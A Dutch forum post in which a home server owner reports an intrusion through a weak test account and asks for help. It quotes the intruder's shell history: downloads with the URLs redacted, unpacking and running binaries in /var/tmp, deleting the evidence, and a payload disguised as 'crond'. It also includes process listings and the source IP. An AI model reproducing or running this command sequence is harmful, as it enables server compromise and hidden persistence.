Hi,
Ik ben de laatste tijd weer wat aan het spelen met mijn linux server met daarop FC6.
Nu had een test gebruiker aangemaakt test/test om je raad het al het een en ander te testen.
Wil ik vanavond weer verder gaan, blijkt het wachtwoord verandert te zijn, ik inloggen als root. En daarna het password verandert (weer in test) en daarna even in history gekeken. Tot mijn schrik zag ik daar het volgende in. (gelijk het pwd moeilijker gemaakt)
de twee maal een tar die uitgepakt en uitgevoerd word. Het is geen script wat er uitgepakt maar een binarie. Plus dat ik de laatste regel niet helemaal snap. wat doet hij daar nou?
Aan beveiliging heb ik momenteel niets, geen SElinux of firewall. Ik zit achter een NAT.
Hoe kom ik er nu acher wat er mijn PC aan de hand is, want ik kan me niet voorstellen dat dit onschuldig is. en hoe maak ik het ongedaan?
een ps -aux geeft het volgende:
nog wat gegevens:
Het ip waarvan het gebeurde is: 82.78.183.5
Ik heb ook een tcp dump gedaan, maar daar lijkt alles redelijk rustig
Ik ben de laatste tijd weer wat aan het spelen met mijn linux server met daarop FC6.
Nu had een test gebruiker aangemaakt test/test om je raad het al het een en ander te testen.
Wil ik vanavond weer verder gaan, blijkt het wachtwoord verandert te zijn, ik inloggen als root. En daarna het password verandert (weer in test) en daarna even in history gekeken. Tot mijn schrik zag ik daar het volgende in. (gelijk het pwd moeilijker gemaakt)
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| uname -a w passwd cd /var/tmp cat /etc/issue wget malware tar xzvf 2.6.tgz ./2.6 rm -rf 2.6.tgz rm -rf 2.6 wget malware tar xzvf 2.tgz ./2 rm -rf 2.tgz rm -rf 2 cd /var/tmp; wget nog meer malware; tar xzvf *.tgz; rm -rf *.tgz; cd .www; export PATH="."; crond exit |
de twee maal een tar die uitgepakt en uitgevoerd word. Het is geen script wat er uitgepakt maar een binarie. Plus dat ik de laatste regel niet helemaal snap. wat doet hij daar nou?
Aan beveiliging heb ik momenteel niets, geen SElinux of firewall. Ik zit achter een NAT.
Hoe kom ik er nu acher wat er mijn PC aan de hand is, want ik kan me niet voorstellen dat dit onschuldig is. en hoe maak ik het ongedaan?
een ps -aux geeft het volgende:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
| USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.1 2036 592 ? Ss Apr03 0:01 init [3] root 2 0.0 0.0 0 0 ? S Apr03 0:00 [migration/0] root 3 0.0 0.0 0 0 ? SN Apr03 0:00 [ksoftirqd/0] root 4 0.0 0.0 0 0 ? S Apr03 0:00 [watchdog/0] root 5 0.0 0.0 0 0 ? S< Apr03 0:00 [events/0] root 6 0.0 0.0 0 0 ? S< Apr03 0:00 [khelper] root 7 0.0 0.0 0 0 ? S< Apr03 0:00 [kthread] root 51 0.0 0.0 0 0 ? S< Apr03 0:00 [kblockd/0] root 52 0.0 0.0 0 0 ? S< Apr03 0:00 [kacpid] root 128 0.0 0.0 0 0 ? S< Apr03 0:00 [cqueue/0] root 129 0.0 0.0 0 0 ? S< Apr03 0:00 [ksuspend_usbd] root 132 0.0 0.0 0 0 ? S< Apr03 0:00 [khubd] root 134 0.0 0.0 0 0 ? S< Apr03 0:00 [kseriod] root 152 0.0 0.0 0 0 ? S Apr03 0:13 [pdflush] root 153 0.0 0.0 0 0 ? S Apr03 0:14 [pdflush] root 154 0.0 0.0 0 0 ? S< Apr03 0:15 [kswapd0] root 155 0.0 0.0 0 0 ? S< Apr03 0:00 [aio/0] root 309 0.0 0.0 0 0 ? S< Apr03 0:00 [kpsmoused] root 331 0.0 0.0 0 0 ? S< Apr03 0:00 [ata/0] root 332 0.0 0.0 0 0 ? S< Apr03 0:00 [ata_aux] root 335 0.0 0.0 0 0 ? S< Apr03 0:00 [scsi_eh_0] root 336 0.0 0.0 0 0 ? S< Apr03 0:00 [scsi_eh_1] root 341 0.0 0.0 0 0 ? S< Apr03 0:34 [kmirrord] root 346 0.0 0.0 0 0 ? S< Apr03 0:00 [ksnapd] root 347 0.0 0.0 0 0 ? S< Apr03 0:00 [kcopyd] root 348 0.0 0.0 0 0 ? S< Apr03 0:36 [kjournald] root 375 0.0 0.0 0 0 ? S< Apr03 0:00 [kauditd] root 409 0.0 0.1 2212 608 ? S<s Apr03 0:01 /sbin/udevd -d root 959 0.0 0.0 0 0 ? S< Apr03 0:00 [kgameportd] root 961 0.0 0.0 0 0 ? S< Apr03 0:00 [ac97/0] test 1204 0.0 0.2 1948 964 ? Ss 03:04 0:00 crond root 1371 0.0 0.0 0 0 ? S< Apr03 0:00 [kmpathd/0] root 1432 0.0 0.0 0 0 ? S< Apr03 0:00 [kjournald] root 1589 0.0 0.0 1624 284 ? Ss Apr03 0:01 cpuspeed -d -p root 1933 0.0 0.1 2276 696 ? Ss Apr03 0:00 /sbin/dhclient root 2061 0.0 0.1 1700 580 ? Ss Apr03 0:01 syslogd -m 0 root 2064 0.0 0.0 1640 400 ? Ss Apr03 0:00 klogd -x rpc 2114 0.0 0.1 1776 532 ? Ss Apr03 0:00 portmap root 2139 0.0 0.1 1892 800 ? Ss Apr03 0:00 rpc.statd root 2181 0.0 0.1 4924 548 ? Ss Apr03 0:00 rpc.idmapd dbus 2209 0.0 0.2 2712 904 ? Ss Apr03 0:00 dbus-daemon --s root 2255 0.0 0.2 12696 1292 ? Ssl Apr03 0:02 pcscd root 2289 0.0 0.0 1880 440 ? Ss Apr03 0:00 /usr/bin/hidd - root 2312 0.0 0.2 6268 1108 ? Ssl Apr03 0:00 automount root 2335 0.0 0.1 1644 548 ? Ss Apr03 0:00 /usr/sbin/acpid root 2350 0.0 0.4 9592 2112 ? Ss Apr03 0:00 cupsd root 2416 0.0 0.0 1872 356 ? Ss Apr03 0:00 gpm -m /dev/inp root 2431 0.0 0.2 5228 1104 ? Ss Apr03 0:00 crond xfs 2458 0.0 0.2 3264 1132 ? Ss Apr03 0:00 xfs -droppriv - root 2506 0.0 0.0 2208 432 ? Ss Apr03 0:00 /usr/sbin/atd avahi 2522 0.0 0.2 2548 1340 ? Ss Apr03 0:00 avahi-daemon: r avahi 2523 0.0 0.0 2548 324 ? Ss Apr03 0:00 avahi-daemon: c 68 2538 0.0 0.7 5228 3520 ? Ss Apr03 0:05 hald root 2539 0.0 0.2 2980 900 ? S Apr03 0:00 hald-runner 68 2545 0.0 0.1 1972 796 ? S Apr03 0:00 hald-addon-acpi root 2546 0.0 0.1 3036 880 ? S Apr03 0:00 /usr/libexec/ha 68 2554 0.0 0.1 1972 792 ? S Apr03 0:00 hald-addon-keyb 68 2557 0.0 0.1 1972 792 ? S Apr03 0:00 hald-addon-keyb 68 2560 0.0 0.1 1968 788 ? S Apr03 0:00 hald-addon-keyb root 2607 0.0 0.1 1952 504 ? S Apr03 0:00 /usr/sbin/smart root 2613 0.0 0.0 1628 432 tty1 Ss+ Apr03 0:00 /sbin/mingetty root 2614 0.0 0.0 1624 424 tty2 Ss+ Apr03 0:00 /sbin/mingetty root 2615 0.0 0.0 1628 432 tty3 Ss+ Apr03 0:00 /sbin/mingetty root 2616 0.0 0.0 1628 432 tty4 Ss+ Apr03 0:00 /sbin/mingetty root 2617 0.0 0.0 1628 432 tty5 Ss+ Apr03 0:00 /sbin/mingetty root 2618 0.0 0.0 1628 428 tty6 Ss+ Apr03 0:00 /sbin/mingetty dovecot 3197 0.0 0.3 4364 1352 ? S 15:55 0:01 imap-login dovecot 3857 0.0 0.3 4368 1356 ? S 21:11 0:00 imap-login root 3861 0.0 0.5 8032 2420 ? Ss 21:12 0:00 sshd: root@pts/ root 3863 0.0 0.3 4488 1384 pts/0 Ss+ 21:12 0:00 -bash postfix 3914 0.0 0.3 6312 1608 ? S 21:20 0:00 pickup -l -t fi dovecot 3925 0.0 0.3 4368 1356 ? S 21:22 0:00 imap-login root 4050 0.0 0.5 8032 2352 ? Ss 21:29 0:00 sshd: test [pri test 4052 0.0 0.3 8184 1440 ? S 21:29 0:00 sshd: test@pts/ test 4053 0.0 0.3 4488 1408 pts/1 Ss+ 21:29 0:00 -bash root 4116 0.2 0.5 8028 2424 ? Ss 21:42 0:02 sshd: root@pts/ root 4119 0.0 0.3 4488 1384 pts/2 Ss 21:42 0:00 -bash root 4345 0.0 0.5 13360 2476 ? Ss 21:52 0:00 smbd -D root 4348 0.0 0.2 8748 1224 ? Ss 21:52 0:00 nmbd -D root 4350 0.0 0.2 13360 1196 ? S 21:52 0:00 smbd -D root 4360 0.0 0.2 4220 936 pts/2 R+ 21:55 0:00 ps -aux root 5351 0.0 0.2 4484 1192 ? S Apr04 0:00 /bin/sh /usr/bi mysql 5387 0.0 4.6 127100 20956 ? Sl Apr04 8:39 /usr/libexec/my root 6309 0.0 0.2 5180 944 ? Ss Apr04 0:00 /usr/sbin/sshd root 28680 0.0 0.3 6244 1648 ? Ss Apr08 0:00 /usr/libexec/po root 28784 0.0 1.9 26984 8952 ? Ss Apr08 0:00 /usr/sbin/httpd apache 28786 0.0 3.0 35024 13580 ? S Apr08 0:02 /usr/sbin/httpd apache 28787 0.0 3.6 37020 16208 ? S Apr08 0:03 /usr/sbin/httpd apache 28788 0.0 2.4 32776 10996 ? S Apr08 0:01 /usr/sbin/httpd apache 28789 0.0 3.5 36348 15736 ? S Apr08 0:03 /usr/sbin/httpd apache 28790 0.0 3.2 35284 14648 ? S Apr08 0:03 /usr/sbin/httpd apache 28791 0.0 3.2 35264 14564 ? S Apr08 0:03 /usr/sbin/httpd apache 28792 0.0 3.7 36920 17016 ? S Apr08 0:06 /usr/sbin/httpd apache 28793 0.0 3.7 37208 17072 ? S Apr08 0:03 /usr/sbin/httpd root 28815 0.0 0.1 1836 488 ? Ss Apr08 0:11 /usr/sbin/dovec root 28818 0.0 0.3 7128 1352 ? S Apr08 0:01 dovecot-auth dovecot 28819 0.0 0.2 4356 1344 ? S Apr08 0:11 pop3-login dovecot 28820 0.0 0.3 4360 1348 ? S Apr08 0:11 pop3-login dovecot 28821 0.0 0.2 4356 1344 ? S Apr08 0:11 pop3-login root 28893 0.0 0.1 4984 616 ? Ss Apr08 0:00 /usr/sbin/sasla root 28894 0.0 0.0 4984 340 ? S Apr08 0:00 /usr/sbin/sasla root 28896 0.0 0.0 4984 352 ? S Apr08 0:00 /usr/sbin/sasla root 28897 0.0 0.0 4984 340 ? S Apr08 0:00 /usr/sbin/sasla root 28898 0.0 0.0 4984 340 ? S Apr08 0:00 /usr/sbin/sasla postfix 28918 0.0 0.3 6368 1728 ? S Apr08 0:00 qmgr -l -t fifo apache 31672 0.0 2.4 32784 10984 ? S Apr09 0:00 /usr/sbin/httpd apache 31681 0.0 2.4 33052 11232 ? S Apr09 0:00 /usr/sbin/httpd apache 31682 0.0 2.2 32128 10164 ? S Apr09 0:00 /usr/sbin/httpd apache 31683 0.0 2.2 32132 10132 ? S Apr09 0:00 /usr/sbin/httpd apache 31684 0.0 2.5 33148 11268 ? S Apr09 0:01 /usr/sbin/httpd apache 31685 0.0 2.2 32080 10208 ? S Apr09 0:00 /usr/sbin/httpd apache 31686 0.0 2.1 31664 9612 ? S Apr09 0:00 /usr/sbin/httpd apache 31687 0.0 2.2 32080 10192 ? S Apr09 0:00 /usr/sbin/httpd |
nog wat gegevens:
Het ip waarvan het gebeurde is: 82.78.183.5
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| ping -a 82.78.183.5
Pingen naar 82-78-183-5.oradea.rdsnet.ro [82.78.183.5] met 32 byte gegevens:
Antwoord van 82.78.183.5: bytes=32 tijd=44 ms TTL=117
Antwoord van 82.78.183.5: bytes=32 tijd=41 ms TTL=117
Antwoord van 82.78.183.5: bytes=32 tijd=43 ms TTL=117
Antwoord van 82.78.183.5: bytes=32 tijd=41 ms TTL=117
Ping-statistieken voor 82.78.183.5:
Pakketten: verzonden = 4, ontvangen = 4, verloren = 0
(0% verlies).De gemiddelde tijd voor het uitvoeren van één bewerking in mill
iseconden:
Minimum = 41ms, Maximum = 44ms, Gemiddelde = 42ms |
Ik heb ook een tcp dump gedaan, maar daar lijkt alles redelijk rustig
[ Voor 94% gewijzigd door pasta op 11-04-2007 13:49 ]
https://f1nerd.nl
/u/64936/crop560fa53296a1c.png?f=community)
:strip_icc():strip_exif()/u/17313/_IGP1526kl2.jpg?f=community)
/u/31090/bla.png?f=community)
:strip_exif()/u/62088/sp_jh2.gif?f=community)
/u/34216/avatar-60x60.png?f=community){kind=avatar}